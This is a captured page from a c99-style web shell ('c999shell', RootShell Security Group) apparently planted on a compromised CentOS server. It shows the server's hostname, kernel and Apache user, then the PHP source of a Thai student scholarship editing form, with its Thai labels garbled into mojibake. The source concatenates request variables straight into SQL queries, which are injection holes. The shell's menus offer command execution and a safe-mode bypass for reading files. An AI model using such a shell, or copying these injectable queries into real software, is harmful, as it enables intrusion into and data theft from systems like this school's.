Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Std_Acc_depart/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?php
session_start();
if (session_is_registered("valid_user")&&session_is_registered("Priority")&&session_is_registered("password") )
{
include("../include/FunctionDB.php");
include("admin_menu.php");
include("../include/Function.php");
ConnectDB();
$sql ="Select * From student_tb Where Student_id='$Student_id' ";
$result = mysql_query($sql) or die("Error".mysql_error());
$rs = mysql_fetch_array($result);
$sql1 = "Select * From std_scholarship_tb Where code='$code'";
$result1 = mysql_query($sql1) or die("Error".mysql_error());
$row = mysql_fetch_array($result1);
?>
<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">
<script language="JavaScript">
<!--
function formCheck(formobj){
// Enter name of mandatory fields
var fieldRequired = Array("mDate","mMonth","mYear","Punish_type","Perform", "Consider");
// Enter field description to appear in the dialog box
var fieldDescription = Array("Date","Month","Year","Punish type","Perform", "Consider");
// dialog message
var alertMsg = "Please complete the following fields:\n";
var l_Msg = alertMsg.length;
for (var i = 0; i < fieldRequired.length; i++){
var obj = formobj.elements[fieldRequired[i]];
if (obj){
switch(obj.type){
case "select-one":
if (obj.selectedIndex == -1 || obj.options[obj.selectedIndex].text == ""){
alertMsg += " - " + fieldDescription[i] + "\n";
}
break;
case "select-multiple":
if (obj.selectedIndex == -1){
alertMsg += " - " + fieldDescription[i] + "\n";
}
break;
case "text":
case "textarea":
if (obj.value == "" || obj.value == null){
alertMsg += " - " + fieldDescription[i] + "\n";
}
break;
default:
}
if (obj.type == undefined){
var blnchecked = false;
for (var j = 0; j < obj.length; j++){
if (obj[j].checked){
blnchecked = true;
}
}
if (!blnchecked){
alertMsg += " - " + fieldDescription[i] + "\n";
}
}
}
}
if (alertMsg.length == l_Msg){
return true;
}else{
alert(alertMsg);
return false;
}
}
// -->
//-->
</script>
<table width="832" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="832" ><br>
<fieldset>
<legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Edu_Menu.php">˹éÒËÅÑ¡</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_std.php?Student_id=<? echo $rs[Student_id];?>">¢éÍÁÙÅ»ÃÐÇѵԹѡÈÖ¡ÉÒ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Std_Scho.php?Student_id=<? echo $rs[Student_id];?>">¢éÍÁÙŷع¹Ñ¡ÈÖ¡ÉÒ</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /><a href="AddScho.php?Student_id=<? echo $rs[Student_id];?>">à¾ÔèÁ¢éÍÁÙŷع¹Ñ¡ÈÖ¡ÉÒ</a></font></legend>
<form id="form1" name="form1" method="post" action="EditScho.php">
<table width="76%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#E4E4E4" style="border:1px solid gray">
<tr bgcolor="#DDF3DC">
<td height="25" colspan="3"><div align="center"><strong><font color="#FF0000" size="4" face="Tahoma">á¡éä¢</font><font size="4" face="Tahoma"><strong><font color="#FF0000"> </font><font color="#000000" size="4" face="Tahoma">¢éÍÁÙŷع¡ÒÃÈÖ¡ÉÒ</font></strong></font></strong></div></td>
</tr>
<tr>
<td bgcolor="#EEEEEE"><div align="center"><font size="2" face="Tahoma">ÃËÑʹѡÈÖ¡ÉÒ</font></div></td>
<td bgcolor="#EEEEEE"> </td>
<td bgcolor="#EEEEEE"><strong><font size="2" face="Tahoma"><? echo $rs[Student_id]?></font></strong></td>
</tr>
<tr>
<td width="27%" bgcolor="#EEEEEE"><div align="center"><font size="2" face="Tahoma, MS Sans Serif">ª×èÍ-¹ÒÁÊ¡ØÅ</font></div></td>
<td width="3%" bgcolor="#EEEEEE"><div align="center"><font color="#FF0000" size="4" face="Tahoma"></font></div></td>
<td width="70%" bgcolor="#EEEEEE"><strong><font size="2" face="Tahoma"><? echo $rs[First_name]?> <? echo $rs[Name]?> <? echo $rs[Lastname]?></font></strong></td>
</tr>
<tr>
<td bgcolor="#EEEEEE"><div align="center"><font size="2" face="Tahoma, MS Sans Serif">Çѹ·ÕèÃѺ·Ø¹</font></div></td>
<td bgcolor="#EEEEEE"><div align="center"><font color="#FF0000" size="4" face="Tahoma"></font></div></td>
<td bgcolor="#EEEEEE"><font color="#000000" size="2" face="Tahoma">Çѹ·Õè
<select name="mDate" id="select" class="select" >
<?php
$Date_rec = $row[Date_rec];
$yearthai = explode("-",$Date_rec);
$mDate = intval($yearthai[2]);
$mMonth = intval($yearthai[1]);
$mYear = intval($yearthai[0]);
for($i=0;$i<=31;$i++)
{
if( $i == 0)
echo"\n\t<option value=\"$mDate\" selected>$mDate</option>\n ";
else
echo"\n\t<option value=\"$i\">$i</option>\n ";
}
// getDay1to31();
?>
</select>
à´×͹
<select name="mMonth" id="select" class="select" >
<?php
$Date_rec = $row[Date_rec];
$yearthai = explode("-",$Date_rec);
$mDate= intval($yearthai[2]);
$Month = intval($yearthai[1]);
$mYear = intval($yearthai[0]);
$mMonth = $Month;
$CMonth = TxtThaiMonth($Month);
for($i=-1;$i<=11;$i++)
{
$a = $i+1;
if( $a == 0)
echo"\n\t<option value=\"$mMonth\" selected>$CMonth</option>\n ";
else
echo"\n\t<option value=\"$a\">$ThaiMonth[$i]</option>\n ";
}
// getThaiMonth();
?>
</select>
»Õ ¾.È.
<input name="mYear" type="text" class="input" id="mYear" value="<? echo $mYear ?>" size="5" maxlength="4" />
</font></td>
</tr>
<tr>
<td bgcolor="#EEEEEE"><div align="center"><font size="2" face="Tahoma, MS Sans Serif">ª×èͷع</font></div></td>
<td bgcolor="#EEEEEE"><div align="center"><font color="#FF0000" size="4" face="Tahoma"></font></div></td>
<td bgcolor="#EEEEEE"><font face="Tahoma, MS Sans Serif"> </font><font size="2">
<select name="Scholarship_code" id="Scholarship_code" class="input1" >
<?php
$Scholarship_code = $row[Scholarship_code];
$strSQL2 = "SELECT * FROM scholarship_tb ";
$result2 = mysql_query($strSQL2);
$strSQL3 = "SELECT * FROM scholarship_tb Where Scholarship_code='$Scholarship_code' ";
$result3 = mysql_query($strSQL3);
while( $rss = mysql_fetch_array($result2))
{
echo"<option value=\"$rss[Scholarship_code]\" ><b>$rss[Scholarship_name]</b></option>\n";
while($rss3 = mysql_fetch_array($result3))
{
echo"<option value=\"$rss3[Scholarship_code]\" ><b>$rss3[Scholarship_name]</b></option>\n";
}
}
?>
</select>
</font><font face="Tahoma, MS Sans Serif"> </font><font size="2" face="Tahoma"> </font> </td>
</tr>
<tr>
<td bgcolor="#EEEEEE"><div align="center"><font color="#000000" size="2" face="Tahoma">¡ÒþԨÒÃ³Ò </font></div></td>
<td bgcolor="#EEEEEE"> </td>
<td bgcolor="#EEEEEE"><textarea name="Consider" cols="60" rows="5" id="Consider"><? echo $row[Consider]?></textarea></td>
</tr>
<tr bgcolor="#DDF3DC">
<td colspan="3"><div align="center">
<input type="hidden" name="Student_id" value="<? echo $row[Student_id]?>" />
<input type="hidden" name="code" value="<? echo $row[code]?>" />
<input type="submit" name="Submit" value=" ºÑ¹·Ö¡ " />
</div></td>
</tr>
</table>
</form>
</fieldset>
<br>
<font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>ËÁÒÂà赯 :</b> ãªéàÁÒÊì¤ÅÔ¡·Õèª×èÍ<br>
</font></td>
</tr>
</table>
<?php
}
else
{
echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";
echo"Please Login ";
}
?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]-- |